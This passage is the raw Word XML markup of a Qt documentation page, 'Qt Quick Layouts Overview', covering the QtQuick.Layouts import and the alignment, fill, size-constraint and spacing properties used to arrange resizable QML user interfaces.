          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Layouts Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1380"/>
      <w:bookmarkEnd w:id="1381"/>
      <w:bookmarkEnd w:id="1382"/>
      <w:bookmarkEnd w:id="1383"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Layouts are items that are used to arrange items in a user interface. Since Qt Quick Layouts also resize their items, they are well suited for resizable user interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1384" w:name="_Toc483000827"/>
      <w:bookmarkStart w:id="1385" w:name="_Toc483003820"/>
      <w:bookmarkStart w:id="1386" w:name="_Toc483604173"/>
      <w:bookmarkStart w:id="1387" w:name="_Toc483605393"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Getting started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1384"/>
      <w:bookmarkEnd w:id="1385"/>
      <w:bookmarkEnd w:id="1386"/>
      <w:bookmarkEnd w:id="1387"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The QML types can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imported</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> into your application using the following import statement in your</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Layouts </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1388" w:name="key-features"/>
      <w:bookmarkStart w:id="1389" w:name="_Toc483000828"/>
      <w:bookmarkStart w:id="1390" w:name="_Toc483003821"/>
      <w:bookmarkStart w:id="1391" w:name="_Toc483604174"/>
      <w:bookmarkStart w:id="1392" w:name="_Toc483605394"/>
      <w:bookmarkEnd w:id="1388"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1389"/>
      <w:bookmarkEnd w:id="1390"/>
      <w:bookmarkEnd w:id="1391"/>
      <w:bookmarkEnd w:id="1392"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some of the key features are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1673" w:anchor="alignment-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Alignment</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of items can be specified with the</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1674" w:anchor="alignment-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.alignment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1675" w:anchor="fillWidth-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Resizable items</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can be specified with the</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1676" w:anchor="fillWidth-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.fillWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1677" w:anchor="fillHeight-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.fillHeight</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properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1678" w:anchor="size-constraints" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Size constraints</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can be specified with</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1679" w:anchor="minimumWidth-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.minimumWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1680" w:anchor="preferredWidth-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.preferredWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1681" w:anchor="maximumWidth-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.maximumWidth</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properties ("Width" can be replaced with "Height" for specifying similar constraints to the height).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1682" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Spacings</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can be specified with</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1683" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>spacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1684" w:anchor="rowSpacing-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rowSpacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1685" w:anchor="columnSpacing-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>columnSpacing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In addition to the above features,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1686" w:history="1">
